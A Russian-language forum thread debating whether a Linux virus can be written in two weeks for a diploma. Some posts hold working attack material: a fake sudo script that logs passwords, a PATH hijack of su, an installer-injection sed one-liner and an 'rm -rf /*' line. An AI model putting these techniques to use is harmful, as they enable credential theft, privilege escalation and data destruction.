Написание вируса за две недели (Реально-ли?)

[Denjs]

всякая *.run-херня, которую пользователи качают с сайтов вроде nVidia

Кстати, эту хренотень пользователи качают в каталог, куда имеют право записи он и все его вирусы, а потом еще и запускает с правами root — раздолье вирусам для повышения привилегий.

теоретически.. практически - вставлю мои 5 копеек: сдается мне, уважаемые, что вы не смотрели в то, что лежит внутри этих самых .run
1) не понимаю зачем скрипту сборки модуля ядра (см nVidia))) работать от рута. Только после "make -install"? да?
2) в ряде случаев, там лежит не shell, а shell c "zip-архивом внутри", который сам себя разворачивает, а потом запускает бинарник, а вот уже он может запросить у вас права рута. (по крайней мере какой-то из инсталляторов кваков для линукса именно так и работал).

И напомню что бинарник при всем наверняка проверяет себя на контрольную сумму. Не говоря про то что сам shell скрипт скорее всего себя тоже проверяет. Т.е. вы должны развернуть, заразить бинарник, причем точно в то место которое запускается на исполнение _после_ повышения полномочий (и это место вам ещё надо будет найти в бинарнике, который при этом всем ещё может быть упакован или закодирован), после этого - не попортить при этом контрольные суммы, и завернуть обратно. причем так, что бы контрольная сумма архива который идет в теле shell-скрипта сразу после скрипта - тоже не попортилась.. да?
теоретически, это возможно. да вы можете написать такой "комбайн"...

Практически... даже если вы это сделаете... окромя вас никто на эти грабли не наступит. Потому что скачают из интернета.
не говоря о том, что это будет "вирус", который умеет заражать только конкретный тип инсталлятора для конкретной игрушки/драйвера?
А это уже не вирус, вы уж извините. Это программа закладывающая троян, в конкретную версию файла. причем программа, которую вы скорее всего должны будете обновлять/готовить руками и сами для каждого конкретного случая/версии ...

Это не вирусописательство, это взлом.Конкретный, заказной взлом/атака на конкретную систему и конкретную версию ПО. От этого никто не затстрахован.
Надо ли ещё раз уточнять чем отличается "вирус" (способный массово размножаться, заражать системы, получать повышенные привелегии в системе) от "точечного взлома"?

PS: а с вирусами на .bat писанными - мы ещё в досе встречались.

[eddy]

В результате при первом же запуске пользователем su, gksu, kdesu, sudo вирус получит права рута.

Зачем так делать, если у вас уже есть права рута - ведь как-то вы сможете подменить su?

[frp]

Зачем так делать, если у вас уже есть права рута - ведь как-то вы сможете подменить su?

Я же просил ВНИМАТЕЛЬНО ПЕРЕЧИТАТЬ МОЙ ПОСТ
Пишем обертку для su, имеющую такой же интерфейс, как и оригинальный su. Что обертка должна делать: запускать su со скриптом, который запускает вирус и то, что хотел пользователь. Чтобы вместо обычного su вызывался наш, можно создать alias или добавить в PATH путь до этого скрипта.

UPD. Чтобы не возникало неоднозначностей, все с подробностями, где будут лежать файлы:
Суть:
~/.bash_rc - bashrc, в нем для реализации идеи с su должно быть что-то такое:
PATH=~/.virus_binaries/:$PATH
В ~/.virus_binaries и должен лежать наш файл su (с правами на выполнение). Для этого никакие права рута не нужны. (для скрытности вместо ~/.virus_binaries юзаем любую папку с конфигами какой-нибудь программы, но так, чтобы эти конфиги не ломать).

[sash-kan]

И напомню что бинарник при всем наверняка проверяет себя на контрольную сумму

флаг ему в руки. зачем его трогать?

Не говоря про то что сам shell скрипт скорее всего себя тоже проверяет

флаг ему в руки. и наши собственные хэш-суммы. они же прописаны тут же в файле. скачайте run-файл (мы сосредоточились на блобе от nvidia) и посмотрите сами.

Т.е. вы должны развернуть, заразить бинарник

повторю: зачем его трогать? есть сам скрипт и есть архив, который он распаковывает — полное раздолье для добавления произвольного кода.

[watashiwa_daredeska]

И напомню что бинарник при всем наверняка проверяет себя на контрольную сумму.

Если нацелиться на некоторые популярные цели (как explorer.exe в винде), то нехай себе проверяет, вирус может ему новую посчитать после изменения.

[eddy]

запускать su со скриптом, который запускает вирус и то, что хотел пользователь.

И как же она это сделает? Ну зачем вы, не разобравшись в вопросе, пытаетесь что-то придумать?
// в смысле: передать из "обертки" пароль в "настоящую" su вы никак не сможете.

[watashiwa_daredeska]

Это программа закладывающая троян, в конкретную версию файла. причем программа, которую вы скорее всего должны будете обновлять/готовить руками и сами для каждого конкретного случая/версии ...

Совсем не обязательно. Всякие эти инсталляторы делаются некоторым ограниченным набором инструментов. Т.е. можно ломать, например, все инсталляторы, сделанные с помощью программы X.

И как же она это сделает?

Обертка вокруг su предварительно перехватит пароль.

[Portnov]

eddy

Код: Выделить всё

#!/bin/sh
su -c "rm -rf /*; bash"

не?

[watashiwa_daredeska]

PS: а с вирусами на .bat писанными - мы ещё в досе встречались.

.bat — несоизмеримо менее мощный язык, да и готового инструментария — кот наплакал, это вам не полноценный *nix с shell/sed/awk.

[watashiwa_daredeska]

Зачем так делать, если у вас уже есть права рута - ведь как-то вы сможете подменить su?

А Вы всегда вызываете /bin/su? Если нет, то некий исполняемый скрипт su может лежать где угодно в $PATH перед /bin. Например, часто встречается $HOME/bin. Конечно, от этой атаки спасает noexec на всё, куда может писать пользователь. Но есть еще популярный нынче fuse: если пользователю разрешено пользоваться fuse и вирус прописан в ~/.profile, то примонтировать какой-нибудь каталог с исполняемыми скриптами и прописать этот каталог в $PATH — дело техники. А учитывая, что Python чуть ли не обгоняет Perl на десктопах, вирус вполне может таскать свою собственную реализацию FS over FUSE.

[Crazy]

собрать левую rpm

и ее довольно быстро удалят из репозитория.

Быстро, не быстро, а время до обнаружения пройдет достаточно, что бы заразить несколько компьютеров.

[frp]

И как же она это сделает? Ну зачем вы, не разобравшись в вопросе, пытаетесь что-то придумать?

Если вы не поняли суть идеи, это еще не значит, что она абсолютно не правильна. Так что зря обвиняете в том, что я совсем не разобрался.

// в смысле: передать из "обертки" пароль в "настоящую" su вы никак не сможете.

Во-первых, смогу. Это очень легко делается
Во-вторых, зачем?
Пользователь ввел комманду: su -c "something"
Наша обертка получила управление:
argv={"su","-c","something",NULL}
Копируем argv (так, чтобы под строку, идущую после "-c", было выделено немного больше памяти).
Тогда мы ищем следующий после -c аргумент (если его нет - добавляем "-c" и "/home/someuser/.virus_binaries/virus" в конец массива) и добавляем перед ним "/home/someuser/.virus_binaries/virus && ".
Получится примерно такая штука: argv_modified={"su","-c","/home/someuser/.virus_binaries/",NULL}
А далее тупо execv("/bin/su",argv_modified);

Щас еще код напишу

[watashiwa_daredeska]

1) не понимаю зачем скрипту сборки модуля ядра (см nVidia))) работать от рута. Только после "make -install"? да?
2) в ряде случаев, там лежит не shell, а shell c "zip-архивом внутри", который сам себя разворачивает, а потом запускает бинарник, а вот уже он может запросить у вас права рута. (по крайней мере какой-то из инсталляторов кваков для линукса именно так и работал).

И напомню что бинарник при всем наверняка проверяет себя на контрольную сумму. Не говоря про то что сам shell скрипт скорее всего себя тоже проверяет.

Чтобы не быть голословным, скачал себе NVIDIA-Linux-x86_64-270.41.19.run, для экспериментов скопировал в NVIDIA-Linux-x86_64-270.41.19.ownd.run.

user@localhost

$ sh NVIDIA-Linux-x86_64-270.41.19.run Verifying archive integrity... OK Uncompressing NVIDIA Accelerated Graphics Driver for Linux-x86_64 270.41.19..... Дальше bla-bla-bla, ERROR: nvidia-installer must be run as root

Пишем простенькую команду, которая, для простоты, впендюрит в 'ownd' инсталлятор скриптик, который выведет "YOU ARE OWND!!!!!!!!!!!!!!!" не сломав внутреннюю "Verifying archive integrity":

user@localhost

$ sed -r -i '1,10s/^skip=.*$/echo "YOU ARE OWND!!!!!!!!!!!!!!!";&/' NVIDIA-Linux-x86_64-270.41.19.ownd.run $ sh NVIDIA-Linux-x86_64-270.41.19.ownd.run YOU ARE OWND!!!!!!!!!!!!!!! Verifying archive integrity... OK Uncompressing NVIDIA Accelerated Graphics Driver for Linux-x86_64 270.41.19..... Дальше bla-bla-bla, ERROR: nvidia-installer must be run as root

Единственное ограничение именно этого способа заражения — злой внедряемый скрипт должен быть в одну строку, но shell позволяет строки произвольной длины (хоть гигабайты), а синтаксис позволяет упихать в эту строку всё, что угодно, кроме here-documents, но они синтаксический сахарок и без него можно обойтись.
Уверен, эта заражалка будет работать почти на всех версиях инсталляторов nVidia.

[sash-kan]

А Вы всегда вызываете /bin/su?

некоторые — всегда.
а для напоминания:

Код: Выделить всё

$ alias su
alias su='echo qwa-qwa!'
$ alias sudo
alias sudo='echo qwa-qwa!'

[watashiwa_daredeska]

некоторые — всегда.

Ключевое слово выделено :)

[sash-kan]

передать из "обертки" пароль в "настоящую" su вы никак не сможете.

а зачем? можно прикинуться, что пароль введён неверно.
вот пример диалога:

Код: Выделить всё

$ sudo -s
[sudo] password for al:
Sorry, try again.
[sudo] password for al:
Sorry, try again.
[sudo] password for al:
Sorry, try again.
[sudo] password for al:
Sorry, try again.
sudo: 3 incorrect password attempts

первая попытка была вызвана обёрткой. и три попытки было дано «штатной» программой sudo.
содержимое скрипта:

Код: Выделить всё

#!/bin/bash
echo -n "[sudo] password for $USER: "
read -s p
echo
echo $p >> /tmp/grabbed
sleep 2
echo "Sorry, try again."
/usr/bin/sudo $@

можно и в одну строку завернуть, чтоб alias-ом прописать.

[frp]

Щас еще код напишу smile.gif

Уже написал: http://pastebin.com/A8yuRp91
От рута пока печатается Hello, World! (сначала писал rm -rf /, слава Богу, успел осознать перед первым запуском ).

Пока есть недочеты:
1. По-хорошему надо было бы не /bin/su, а делать which su, чтобы узнать, где лежит su.
2. Некоторые некорректные для su наборы параметров могут дать странные результаты.

UPD 3. Не проверяю на ошибки execv.

[Denjs]

Т.е. вы должны развернуть, заразить бинарник

повторю: зачем его трогать? есть сам скрипт и есть архив, который он распаковывает — полное раздолье для добавления произвольного кода.

не совсем. Скрипт и архив - это один файл. В начале - файла у вас текстовой скрипт, в конце файла - у вас бинарный архив.
А бинарник вам надо трогать, потому что запускается бинарник без рутовских прав, (и скрипт его распаковавший - тоже от обычного пользователя работает) - а уже потом, внутри - он для определенных операций просит систему сделать то или это от рутовских прав, или просит систему дать ему права - уточните о том как это происходит технически? т.е. сам бинарник - "только в определенных местах" работает от имени рута. Может я что-то и путаю в деталях - уточните.
Но по крайней мере я бы делал это именно так.
_______________________________________________________________
И послушайте. Хватить пыжиться и говорить, что вы сможете/неможете внедрить код в файл который будет запускаться под root пользователем и получаться по незащищенным каналам.
Да можете, успокойтесь

но только помните, что это нифига не вирус, а троян и не более.

Вопрос же стоит о вирусе. Не о трояне. О _вирусе_ - который способен без помощи пользователя получить привелегилированные права.
_______________________________________________________________
Кроме того, давайте вспомним о цели топика - выбор тема диплома.

Автору: простите, но исследование механизмов защиты ОС в сценарии когда пользователь знает пароль суперпользователя и готов ввести его по первому требованию <неизвестно откуда> скачанной программы - и способы защиты системы в таком случае - это не диплом. Это курсовая максимум, причем в гуманитарном вузе по предмету "общее введение в информатику" на 1-м курсе.

Хватит. Диплом вы с такой темой вам скорее всего не одобрят. Вирус вы написать за отведенный промежуток времени - не сможете. У вас не хватит ресурса на исследование и поиск уязвимости. Впрочем можете конечно пару дней попробовать поискать корни уязвимостей которые публикуются на secunia.com. но не больше дня - время потеряете)))

Хотите писать программу - вам надо для дипломной работы сто-то серьезное. Простой утилитой вы не отделаетесь). На курсовую - ещё куда ни шло - но не на диплом. Вам нужна _технология_. новая, вами спроектированная и созданная. Шкодить - это и школьники умеют. От вас требуется не показать знания языка программирования, а ваше знание того, как надо проектировать системы, знания принципов построения архитектуры, организации сетевого взаимодействия, проектирования баз данных, построения быстодейтствующих систем, систем реального времени и т.п. по крайней мере я так полагаю о том, что должно бы изучаться на вашей специальности, исходя из выбора тем вами предложенных.

Офисная утилита? да, но только если там будет _технология_. что то что покажет что вы немного больше чем просто "школо-кодер". Например механизм который позволит одновременно нескольким пользователям редактировать один .odt-файл. Что-то подобное делали кажется abi-word-овцы... распределенная БД... система гарантированной доставки сообщений (аля-того-же mq-series (который, кстати, по субьективным впечатлениям очень многих заказчиков - иногда через задницу работает))....

А я вам ещё раз предлагаю написать MMO-FPS-ядро/сервер + клиент. Тут и быстродействие, и многопоточность, массовость, и сетевое взаимодействие, и и синхронизация с поддержкой актуальности данных на клиенте и сервере и большой объем данных, и сложные механизмы организации взаимодействия. Это все надо ещё подумать как надо реализовать. Потом надо обосновать выбор тех или иных технологий и способов их реализации - и т.п. Это уже похоже на диплом.
а с Panda3D - полагаю вы как-раз сможете это сделать за пару недель до работающего прототипа.

А написать вирус - ну разве как демонстрационный пример к исследованию проведенному в рамках курсовой по тебе "защищенность ОС"... но у вас 2 недели - даже провести исследование вы не успеете.

[watashiwa_daredeska]

запускается бинарник без рутовских прав, (и скрипт его распаковавший - тоже от обычного пользователя работает) - а уже потом, внутри - он для определенных операций просит систему сделать то или это от рутовских прав, или просит систему дать ему права - уточните о том как это происходит технически?

Уточняю (см. выше) — технически, при запуске без прав рута установщик драйверов nVidia просит запустить его с правами рута и завершается. Т.е. единственный способ поставить драйвера nVidia — это запустить ВЕСЬ установщик с правами рута, вместе со всеми вирусами.

[Denjs]

запускается бинарник без рутовских прав, (и скрипт его распаковавший - тоже от обычного пользователя работает) - а уже потом, внутри - он для определенных операций просит систему сделать то или это от рутовских прав, или просит систему дать ему права - уточните о том как это происходит технически?

Уточняю (см. выше) — технически, при запуске без прав рута установщик драйверов nVidia просит запустить его с правами рута и завершается. Т.е. единственный способ поставить драйвера nVidia — это запустить ВЕСЬ установщик с правами рута, вместе со всеми вирусами.

а я вам говорю, что да! "такой (таким образом написанный) шелл-скрипт" вы всегда можете превратить в троян.

Мои "упреки" относятся к сложности превращения с троян нормально-написанного установщика - который запускает бинарник, и уже бинарник - только для заданных операций просит пароль рута. Так написанный скрипт - вы, в общем случае, - "задолбаетесь" превращать в троян.

[watashiwa_daredeska]

О _вирусе_ - который способен без помощи пользователя получить привелегилированные права.

Некоторые действия пользователей не считаются «помощью». Например, использование действий пользователя без ведома пользователя. Как-то: распространение путем заражения файлов (без ведома пользователя), которые пользователь перенесет на другие машины, запуск (без ведома пользователя) вместе с программой, запускаемой пользователем. Это всё — саморепликация, уже отличительная черта вируса от трояна, целая эпоха MS DOS прошла под знаменем подобных вирусов.

Мои "упреки" относятся к сложности превращения с троян нормально-написанного установщика

Нормально написанный установщик запускаемый нормальным (в смысле подготовки в сфере ИТ) пользователем в нормальной (в смысле проектирования) нормально администрируемой (в смысле политик безопасности) системе опасности не представляет. Но таких нормальных случаев — 0,0…1%, так что раздолье для вирусов еще то.

[eddy]

первая попытка была вызвана обёрткой. и три попытки было дано «штатной» программой sudo.

Хм, про это я не подумал.
Действительно, так можно "выдурить" рутовский пароль, зная пароль какого-нибудь пользователя, знающего пароль рута.

[sash-kan]

Мои "упреки" относятся к сложности превращения с троян нормально-написанного установщика - который запускает бинарник, и уже бинарник - только для заданных операций просит пароль рута. Так написанный скрипт - вы, в общем случае, - "задолбаетесь" превращать в троян.

бинарник, значит, проверяет, запущен ли он от имени рядового пользователя и затем несколько раз запрашивает пароль рута?
ну, будет на один запрос пароля больше. выдавать запрос будет скрипт, выполняемый до бинарника — спросит, сохранит пароль куда-нибудь, и продолжит выполняться, как ни в чём не бывало.

p.s. программа, скачиваемая с какого-нибудь левого сайта (типа сайта производителя какого-нибудь барахла) ­— явление ненормальное по определению. вне зависимости от того, как именно она написана.
то, что такое явление — обычная практика в мире проприетарных программ — свидельствует лишь о глубине пропасти между этим миром и элементарным здравым смыслом.

[eddy]

программа, скачиваемая с какого-нибудь левого сайта (типа сайта производителя какого-нибудь барахла) ­— явление ненормальное по определению

А как же вы по-другому установите, например, свеженький CUDA-SDK?

[drBatty]

Идея написать вирус нравится больше всего

и с чего посоветуете начать?

с этого:
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -
наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок до семи лет.

[drBatty]

Не зная принципов работы ядра и основ безопасности, вирус написать невозможно.

да, но нужны только основы принципов работы ядра. Вирус написать вполне реально.

Еще раз повторю: для этого вам нужен доступ в систему. И вредительский софт такого типа называется не вирусом, а руткитом, т.к. он не самореплицирующийся - для его установки нужно как-то попасть в систему.

ну и ещё раз - вы определите вирус. Конкретизируйте ТЗ. ИМХО, что-бы ПО имело право носить гордое звание вируса, необходимо и достаточно лишь одного:
1) программа должна уметь модифицировать другие программы таким образом, что-бы другие программы после модификации получали функционал №1.
Естественно, вирус с лёгкостью пишется на shell'е.
Что касается "саморепликации", то это уже не то. Ясное дело, что это невозможно. Ибо ручками невозможно взломать систему, а стало быть и программой - тоже.

[drBatty]

собрать левую rpm, и выложить на всеобщий доступ

дык сколько раз нужно объяснять, зачем надо проверять ЭЦП?

и ее довольно быстро удалят из репозитория.

не удалят. она туда и не попадёт никак, ибо репозиторий - множество подписанных файлов. Потому, что-бы "положить в репозиторий Slackware" вам совсем необязательно ломать slackware.com, вы можете выложить свой вредонос где угодно. Просто подпишитесь ключом Патрега - и все слакварщики - ваши. ;)

[sash-kan]

программа, скачиваемая с какого-нибудь левого сайта (типа сайта производителя какого-нибудь барахла) ­— явление ненормальное по определению

А как же вы по-другому установите, например, свеженький CUDA-SDK?

лично я? никак. у меня нет никакого желания участвовать в его разработке. или даже просто заглядывать в его исходники.

[eddy]

лично я? никак. у меня нет никакого желания участвовать в его разработке. или даже просто заглядывать в его исходники.

А у меня есть. И вообще, вычисления на GPU позволяют довольно хорошо сократить машинное время.
И не надо говорить, что openCL - достойная альтернатива. Сравнивая код на openCL и такой же по функционалу код на CUDA, легко сделать вывод, на чем писать удобнее.

[sash-kan]

лично я? никак. у меня нет никакого желания участвовать в его разработке. или даже просто заглядывать в его исходники.

А у меня есть.

вот и отлично. помогайте в разрабоке — это хорошее дело.